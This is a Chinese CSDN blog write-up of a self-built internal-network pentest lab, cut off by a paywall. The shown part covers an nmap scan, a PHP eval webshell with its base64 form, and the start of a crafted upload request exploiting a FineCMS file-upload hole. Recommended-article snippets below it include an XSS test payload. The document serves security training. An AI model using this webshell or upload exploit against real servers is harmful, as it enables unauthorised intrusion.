自建靶场2022

最新推荐文章于 2024-07-22 08:05:22 发布
最新推荐文章于 2024-07-22 08:05:22 发布
阅读量3.9k 收藏 9
点赞数 2
文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45423582/article/details/122866898
版权

目录

一、靶场介绍

二、拿下web服务器

2.1 任意文件上传拿shell

2.2 反弹meterpreter

2.3 提权

2.4 抓取hash

三、内网渗透

3.1信息收集

3.2 配置代理

3.3 nmap扫描端口

3.4 漏洞利用

3.5 远程登录

四、补充:提权

4.1 本地提权

4.2 远程提权

一、靶场介绍

本靶场是一个简单的内网渗透靶场。需要首先拿到win2008服务器的权限,再渗透内网拿下WinXP,win2008上没有flag,flag在WinXP上。综合考验许多知识,暂未使用防护软件,属于一个比较基础的靶场。

主要配置如下:

系统

ip地址

kali 2020

192.168.1.106

win10 (本机)

192.168.1.104

win2008

192.168.1.107

winxp

10.101.10.133

靶场链接如下:

链接:https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw

提取码:ehs8

ps:win10和kali自备

分享多了怕被封,所以目前是10名额,应该打靶场的人也不多。

二、拿下web服务器

2.1 任意文件上传拿shell

nmap 192.168.1.107 -p 8069 -sV

8069端口是web端口,访问 http://192.168.1.107:8069/ 发现是finecms。

百度搜索finecms漏洞

(15条消息) finecms前台任意文件上传——getshell_W小哥-CSDN博客_任意文件上传getshell

前台注册

首先上传一个正常的头像,找到路径

 <?php @eval($_POST['a']); ?>  # 一句胡木马base64加密
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=

构造数据包如下

POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f5
最低0.47元/天 解锁文章
Syche
关注
“东数西算”全国一体协同数据安全防护体系建设思路初探
fzq0625的博客
09-03 307
他们对“东数西算”算力网络体系等基础设施发起的网络攻击、漏洞攻击、定向攻击、数据窃取等,极易造成信息泄露、应用系统无法使用等问题,不仅影响公民和组织的合法权益,甚至将对国家安全、社会稳定造成严重的威胁。建立全国统一的一体化安全管理协调机构,从安全管理、安全建设、安全运维3个角度出发,构建安全防护管理框架,加强安全数据汇聚和态势感知、加强安全情报跨领域共享交换、加强安全事件的指挥调度能力、推动开展安全合规监督检查,打造一体化安全运营新模式,并协助网信、国安、公安等监管部门做好网络和数据安全工作的监督指导。
【超简单】小白也能搭建的pikachu靶场_github自己搭建靶场
m0_61331573的博客
04-09 897
1、点击链接,下载文件2、 将其放置在自己的环境目录的www下然后就可以访问进来了。
自建靶场 XSS练习(一)
fanxiaoyao1的博客
03-01 982
自建靶场 XSS练习(一) 点击链接快速跳到指定关卡 文章目录自建靶场 XSS练习(一)靶场搭建一、第一关二、第二关三、第三关四、第四关五、第五关六、第六关七、第七关七、第八关九、第九关 靶场搭建 我用的是phpStudy,靶场代码可以去github上找,或者私信问我要 浏览器用的火狐,有hackbar插件,谁用谁知道 一、第一关 点击进入第一关 这关没啥难度,简单粗暴,后台也没有过滤。name=<script>alert(/xss/)</script>就过了,当然你想玩
2024版最新靶场搭建教程(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
07-22 1022
搭建方式小皮搭建靶场Docker 搭建靶场
自建靶场WP(tp+SUID+容器逃逸)
DoNotShyDoIt的博客
07-19 1530
5.0.23*
你还没有自己的靶场吗?来,自己建一个吧
网络安全
01-26 1412
靶场篇1、在线靶场BugKu(简单,推荐新手入门,还有在线工具)https://ctf.bugku.com/index.html北京联合大学BUUCTF(新靶场,难度中上,搜集了很多大赛原题)https://buuoj.cn/CTFhub靶场(含历年赛题) https://www.ctfhub.com/#/indexCTFshow靶场(题较多) https://ctf.show/chall...
0基础教你搭建靶场(本地、虚拟机)
2301_76332302的博客
04-18 2255
完成CMS安装后,导入sqlmap文件夹至虚拟机Kali Linux中root文件夹内(可在本机系统用Xftp软件实现),此时sqlmap.py文件路径为root/sqlmap/,访问靶场。数据库名称:可随便写(建议写bluecms),数据库用户名:root ,数据库密码:root。在虚拟机Windows 2003里启动phpstudy,并设置端口号为90,其他设置参照前面本地搭建靶场phpstudy设置。3,点其他选项菜单,见下图标识点3,新的弹出菜单里选择"phpStudy设置"—
带你快速搭建一个支持ctf动态独立靶机的靶场
fly_enum的博客
09-11 1008
​ 要说开源的ctf训练平台,ctfd是不错的选择,支持各种插件,今天我就来介绍一下如何部署一款支持独立动态靶机的插件。前提是你的ctfd也是docker部署的。
记一次自建靶场三层代理内网渗透过程
Boom!脑洞大爆炸的博客
07-04 816
记一次自建靶场三层代理内网渗透过程
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2748
迟到的文章,就当库存发出来吧~
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1663
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
漏洞靶场平台搭建与漏洞分析文档
04-29
漏洞靶场平台搭建与漏洞分析文档,里面包含漏洞靶场网站的搭建、漏洞分析、工具使用、漏洞脚本样例,来源是红日安全,大家一起学习,进步!
FineCMS 1.8.0 UTF8.zip
05-28
FineCMS(简称FC)是一款基于PHP MySql开发的内容管理系统,采用MVC设计模式实现业务逻辑与表现层的适当分离,使网页设计师能够轻松设计出理想的模板, 插件化方式开发功能易用便于扩展,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供重量级网站建设解决方案。 特色: 自定义模型和字段 超强的自定义模型和字段功能则把系统灵活度发挥到了极致,不用编程就实现各种信息发布和检索。 多国语言支持 系统自带语言有简体中文、繁体中文、英文,其他语言扩展相当方便。 负载能力强 从缓存技术、数据库设计、代码优化等多个角度入手进行优化,支持百万级数据量。 模板制作方便 采用MVC设计模式实现了程序与模板完全分离,灵活的模板标签能完全显示全站信息。 支持文章内链 有助于提高搜索引擎对网站的爬行索引效率,支持Tag自动内链到文章。 表单功能 用于拓展内容模型和会员模型,如报名、评论、询价、咨询等。 推荐位功能 推荐位功能可以让编辑随时把信息推送至指定位置,操作简单实用。 文字块功能 把一些小段内容放在文字块中,支持HTML代码和图片上传。 自定义URL规则 可以完全自定义URL地址规则,包括栏目、内容及自定义页。 功能插件化 按照官方提供的插件为蓝本,用户可开发出属于自己的插件。 SEO处理 性化设置每个栏目的标题标签、描述标签、关键词标签,自动生成百度谷歌网站地图。
记一次自建靶场域渗透过程
Boom!脑洞大爆炸的博客
07-04 1077
记一次自建靶场域渗透过程
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1147
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
自己写一个php上传靶场,GitHub - 7257018/upload-labs-writeup: upload-labs 上传漏洞靶场的解题方法...
weixin_39623411的博客
03-18 262
0x00:前言本篇文章主要记录绕过一个基于php语言的上传漏洞的靶场项目upload-labs (最新commit17ec936) 的19个上传关卡的方法。文章适合有一定上传绕过知识基础的读者阅读,绕过原理请参考其它文章和项目源码,限于篇幅文章中不展开解释。0x01:测试配置可直接下载作者的配置好的PHPStudy靶场运行环境,节省时间。浏览器Firefox插件NoScript插件HackBar抓...
六步快速搭建靶场DVWA 多一步你顺着网线来打我
Lisuyu5201314的博客
06-09 2808
下载并安装PHPstudy 将解压后的DVWA源代码放置phpstudy安装目录下的WWW文件夹 打开刚刚重命名的config.in.php文件,修改db_user和db_password 都修改成root 浏览器访问http:/∥127.0.0.1/DVWA/setup.php,点击最下方的Create Database不好意思 这张没图 - -!浏览器访问http:/172.16.16.52/DVWA/,输入用户名admin,密码password登录dvwa 本机IP地址 关于PHP函数禁
2020-11-16(综合渗透靶场(一))
wahhh123admin的博客
11-17 1246
**综合性靶场mrRobot(一 )** 标题&nmap信息收集& kail:192.168.99.17 靶机ip:nmap 192.168.99.0/24 得出ip为192.168.99.23 找到了ip,查看具体信息 nmap -A 192.168.99.23 结论:80端口是apache服务 靶机系统为Linux 查看又没有隐藏的端口 nmap -p- 192.168.99.23 没有隐藏端口 ...
权限提升-Win溢出漏洞及AT&SC&PS提权
weixin_44805159的博客
10-13 326
#知识点必备用户及用户组权限划分:Windows提权名Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。只要用户账户加入到这些本地组内,这些用户账户也将具备该组所拥有的权限。0x01 普通权限默认情况下,系统为用户分了7个组,并给每个组赋予了不同的操作权限,管理员组(Administrator)、高权限用户组(Power Users)、普通用户组(Users)、备份操作组(Backup Operators)、文件
kali2021.3安装DVWA靶场教程
"kali2021.3安装dvwa靶场" 在本文中,我们将详细探讨如何在Kali Linux 2021.3版本上安装DVWA(Damn Vulnerable Web Application)靶场,这对于初学者进行Web渗透测试是非常有帮助的。DVWA是一个开源的、易受攻击的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值